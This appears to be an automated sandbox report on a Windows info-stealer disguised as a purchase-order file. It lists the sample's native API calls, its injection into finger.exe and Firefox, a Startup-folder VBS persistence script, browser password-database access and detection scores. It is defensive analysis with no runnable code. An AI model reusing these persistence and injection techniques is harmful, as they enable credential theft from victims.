                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2AB0 NtWaitForSingleObject,2_2_017B2AB0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2D30 NtUnmapViewOfSection,2_2_017B2D30
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2D10 NtMapViewOfSection,2_2_017B2D10
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2D00 NtSetInformationFile,2_2_017B2D00
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2DD0 NtDelayExecution,2_2_017B2DD0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2DB0 NtEnumerateKey,2_2_017B2DB0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2C60 NtCreateKey,2_2_017B2C60
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2C00 NtQueryInformationProcess,2_2_017B2C00
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2CF0 NtOpenProcess,2_2_017B2CF0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2CC0 NtQueryVirtualMemory,2_2_017B2CC0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2CA0 NtQueryInformationToken,2_2_017B2CA0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2F60 NtCreateProcessEx,2_2_017B2F60
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2F30 NtCreateSection,2_2_017B2F30
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2FE0 NtCreateFile,2_2_017B2FE0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2FB0 NtResumeThread,2_2_017B2FB0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2FA0 NtQuerySection,2_2_017B2FA0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2F90 NtProtectVirtualMemory,2_2_017B2F90
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2E30 NtWriteVirtualMemory,2_2_017B2E30
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2EE0 NtQueueApcThread,2_2_017B2EE0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2EA0 NtAdjustPrivilegesToken,2_2_017B2EA0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2E80 NtReadVirtualMemory,2_2_017B2E80
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B3010 NtOpenDirectoryObject,2_2_017B3010
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B3090 NtSetValueKey,2_2_017B3090
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B39B0 NtGetContextThread,2_2_017B39B0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B3D70 NtOpenThread,2_2_017B3D70
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B3D10 NtOpenProcessToken,2_2_017B3D10
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC4340 NtSetContextThread,LdrInitializeThunk,5_2_02EC4340
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC4650 NtSuspendThread,LdrInitializeThunk,5_2_02EC4650
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2AF0 NtWriteFile,LdrInitializeThunk,5_2_02EC2AF0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2AD0 NtReadFile,LdrInitializeThunk,5_2_02EC2AD0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2BE0 NtQueryValueKey,LdrInitializeThunk,5_2_02EC2BE0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_02EC2BF0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_02EC2BA0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2B60 NtClose,LdrInitializeThunk,5_2_02EC2B60
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2EE0 NtQueueApcThread,LdrInitializeThunk,5_2_02EC2EE0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_02EC2E80
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2FE0 NtCreateFile,LdrInitializeThunk,5_2_02EC2FE0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2FB0 NtResumeThread,LdrInitializeThunk,5_2_02EC2FB0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2F30 NtCreateSection,LdrInitializeThunk,5_2_02EC2F30
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_02EC2CA0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2C60 NtCreateKey,LdrInitializeThunk,5_2_02EC2C60
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_02EC2C70
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_02EC2DF0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2DD0 NtDelayExecution,LdrInitializeThunk,5_2_02EC2DD0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_02EC2D30
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2D10 NtMapViewOfSection,LdrInitializeThunk,5_2_02EC2D10
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC35C0 NtCreateMutant,LdrInitializeThunk,5_2_02EC35C0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC39B0 NtGetContextThread,LdrInitializeThunk,5_2_02EC39B0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2AB0 NtWaitForSingleObject,5_2_02EC2AB0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2B80 NtQueryInformationFile,5_2_02EC2B80
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2EA0 NtAdjustPrivilegesToken,5_2_02EC2EA0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2E30 NtWriteVirtualMemory,5_2_02EC2E30
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2FA0 NtQuerySection,5_2_02EC2FA0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2F90 NtProtectVirtualMemory,5_2_02EC2F90
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2F60 NtCreateProcessEx,5_2_02EC2F60
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2CF0 NtOpenProcess,5_2_02EC2CF0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2CC0 NtQueryVirtualMemory,5_2_02EC2CC0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2C00 NtQueryInformationProcess,5_2_02EC2C00
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2DB0 NtEnumerateKey,5_2_02EC2DB0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC2D00 NtSetInformationFile,5_2_02EC2D00
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC3090 NtSetValueKey,5_2_02EC3090
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC3010 NtOpenDirectoryObject,5_2_02EC3010
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC3D70 NtOpenThread,5_2_02EC3D70
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC3D10 NtOpenProcessToken,5_2_02EC3D10
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_00339790 NtCreateFile,5_2_00339790
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_00339900 NtReadFile,5_2_00339900
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_00339A00 NtDeleteFile,5_2_00339A00
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_00339AB0 NtClose,5_2_00339AB0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_00339C10 NtAllocateVirtualMemory,5_2_00339C10
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EBE8F05_2_02EBE8F0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E768B85_2_02E768B8
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E9A8405_2_02E9A840
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E928405_2_02E92840
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E929A05_2_02E929A0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F5A9A65_2_02F5A9A6
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EA69625_2_02EA6962
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F4EEDB5_2_02F4EEDB
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F4CE935_2_02F4CE93
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EA2E905_2_02EA2E90
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E90E595_2_02E90E59
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F4EE265_2_02F4EE26
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E9CFE05_2_02E9CFE0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E82FC85_2_02E82FC8
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F0EFA05_2_02F0EFA0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F04F405_2_02F04F40
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F32F305_2_02F32F30
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02ED2F285_2_02ED2F28
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EB0F305_2_02EB0F30
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E80CF25_2_02E80CF2
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F30CB55_2_02F30CB5
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E90C005_2_02E90C00
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E8ADE05_2_02E8ADE0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EA8DBF5_2_02EA8DBF
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E9AD005_2_02E9AD00
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F2CD1F5_2_02F2CD1F
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F312ED5_2_02F312ED
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EAB2C05_2_02EAB2C0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E952A05_2_02E952A0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02ED739A5_2_02ED739A
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E7D34C5_2_02E7D34C
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F4132D5_2_02F4132D
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F4F0E05_2_02F4F0E0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F470E95_2_02F470E9
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E970C05_2_02E970C0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F3F0CC5_2_02F3F0CC
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E9B1B05_2_02E9B1B0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC516C5_2_02EC516C
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E7F1725_2_02E7F172
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F5B16B5_2_02F5B16B
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F416CC5_2_02F416CC
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F4F7B05_2_02F4F7B0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E814605_2_02E81460
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F4F43F5_2_02F4F43F
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F2D5B05_2_02F2D5B0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F475715_2_02F47571
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F3DAC65_2_02F3DAC6
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02ED5AA05_2_02ED5AA0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F31AA35_2_02F31AA3
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F2DAAC5_2_02F2DAAC
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F03A6C5_2_02F03A6C
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F47A465_2_02F47A46
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F4FA495_2_02F4FA49
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F05BF05_2_02F05BF0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02ECDBF95_2_02ECDBF9
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EAFB805_2_02EAFB80
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F4FB765_2_02F4FB76
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E938E05_2_02E938E0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EFD8005_2_02EFD800
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E999505_2_02E99950
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EAB9505_2_02EAB950
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F259105_2_02F25910
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E99EB05_2_02E99EB0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F4FFB15_2_02F4FFB1
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E91F925_2_02E91F92
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F4FF095_2_02F4FF09
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F4FCF25_2_02F4FCF2
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F09C325_2_02F09C32
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EAFDC05_2_02EAFDC0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F47D735_2_02F47D73
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E93D405_2_02E93D40
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F41D5A5_2_02F41D5A
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_003222305_2_00322230
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_0033C1305_2_0033C130
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_0031D0A05_2_0031D0A0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_003111845_2_00311184
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_0031B2D05_2_0031B2D0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_0031D2C05_2_0031D2C0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_0031B4205_2_0031B420
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_0031B41D5_2_0031B41D
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_003259005_2_00325900
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_00323B105_2_00323B10
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02B9E3545_2_02B9E354
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02B9E4735_2_02B9E473
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02BA546C5_2_02BA546C
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02B9CB785_2_02B9CB78
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02B9D8D85_2_02B9D8D8
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02B9E80C5_2_02B9E80C
                      Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 02ED7E54 appears 102 times
                      Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 02E7B970 appears 280 times
                      Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 02F0F290 appears 105 times
                      Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 02EFEA12 appears 86 times
                      Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 02EC5130 appears 58 times
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: String function: 0176B970 appears 280 times
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: String function: 017C7E54 appears 102 times
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: String function: 017FF290 appears 105 times
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: String function: 017B5130 appears 58 times
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: String function: 017EEA12 appears 86 times
Source: P.Order request for quotations.exe, 00000000.00000002.1034365516.0000000000C6E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs P.Order request for quotations.exe
Source: P.Order request for quotations.exe, 00000000.00000002.1048657494.00000000066B0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs P.Order request for quotations.exe
Source: P.Order request for quotations.exe, 00000000.00000002.1048429957.0000000006640000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs P.Order request for quotations.exe
Source: P.Order request for quotations.exe, 00000000.00000002.1034894237.0000000002A9F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs P.Order request for quotations.exe
Source: P.Order request for quotations.exe, 00000000.00000002.1045676915.00000000057C0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameBdkvqnmzb.dll" vs P.Order request for quotations.exe
Source: P.Order request for quotations.exe, 00000002.00000002.1161227472.000000000186D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs P.Order request for quotations.exe
Source: P.Order request for quotations.exe, 00000002.00000002.1160887135.0000000001218000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefinger.exej% vs P.Order request for quotations.exe
Source: P.Order request for quotations.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: P.Order request for quotations.exe, StateMatcher.cs Cryptographic APIs: 'CreateDecryptor'
Source: HashSize.exe.0.dr, StateMatcher.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.P.Order request for quotations.exe.3cf3fd0.1.raw.unpack, StateMatcher.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.P.Order request for quotations.exe.66b0000.6.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.P.Order request for quotations.exe.66b0000.6.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.P.Order request for quotations.exe.66b0000.6.raw.unpack, Task.cs Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.P.Order request for quotations.exe.66b0000.6.raw.unpack, TaskService.cs Task registration methods: 'CreateFromToken'
Source: 7.2.HashSize.exe.3a34c10.5.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 7.2.HashSize.exe.3a34c10.5.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.P.Order request for quotations.exe.66b0000.6.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 7.2.HashSize.exe.3a34c10.5.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 7.2.HashSize.exe.3a34c10.5.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.P.Order request for quotations.exe.66b0000.6.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 7.2.HashSize.exe.3a34c10.5.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.P.Order request for quotations.exe.66b0000.6.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 7.2.HashSize.exe.3a34c10.5.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 7.2.HashSize.exe.3a34c10.5.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.P.Order request for quotations.exe.66b0000.6.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 7.2.HashSize.exe.3a34c10.5.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.P.Order request for quotations.exe.66b0000.6.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.P.Order request for quotations.exe.66b0000.6.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winEXE@12/4@17/10
Source: C:\Users\user\Desktop\P.Order request for quotations.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HashSize.vbs
Source: C:\Users\user\AppData\Roaming\HashSize.exe Mutant created: NULL
Source: C:\Windows\SysWOW64\finger.exe File created: C:\Users\user\AppData\Local\Temp\4ub-1K1Qxn
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HashSize.vbs"
Source: P.Order request for quotations.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: P.Order request for quotations.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\P.Order request for quotations.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: finger.exe, 00000005.00000003.1350891777.000000000291D000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000005.00000003.1348296126.0000000002913000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000005.00000002.3359394622.0000000002913000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000005.00000002.3359394622.0000000002942000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: P.Order request for quotations.exe Virustotal: Detection: 36%
Source: P.Order request for quotations.exe ReversingLabs: Detection: 26%
Source: C:\Users\user\Desktop\P.Order request for quotations.exe File read: C:\Users\user\Desktop\P.Order request for quotations.exe
Source: unknown Process created: C:\Users\user\Desktop\P.Order request for quotations.exe "C:\Users\user\Desktop\P.Order request for quotations.exe"
Source: C:\Users\user\Desktop\P.Order request for quotations.exe Process created: C:\Users\user\Desktop\P.Order request for quotations.exe "C:\Users\user\Desktop\P.Order request for quotations.exe"
Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe Process created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Roaming\HashSize.exe "C:\Users\user\AppData\Roaming\HashSize.exe"
Source: C:\Users\user\AppData\Roaming\HashSize.exe Process created: C:\Users\user\AppData\Roaming\HashSize.exe "C:\Users\user\AppData\Roaming\HashSize.exe"
Source: C:\Windows\SysWOW64\finger.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\P.Order request for quotations.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\P.Order request for quotations.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\P.Order request for quotations.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\P.Order request for quotations.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\P.Order request for quotations.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\P.Order request for quotations.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\P.Order request for quotations.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\P.Order request for quotations.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\P.Order request for quotations.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\P.Order request for quotations.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\P.Order request for quotations.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\P.Order request for quotations.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\P.Order request for quotations.exe Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\P.Order request for quotations.exe Section loaded: rasman.dll
Source: C:\Users\user\Desktop\P.Order request for quotations.exe Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\P.Order request for quotations.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\P.Order request for quotations.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\P.Order request for quotations.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\P.Order request for quotations.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\P.Order request for quotations.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\P.Order request for quotations.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\P.Order request for quotations.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\P.Order request for quotations.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\P.Order request for quotations.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\P.Order request for quotations.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\P.Order request for quotations.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\P.Order request for quotations.exe Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exe Section loaded: iphlpapi.dll
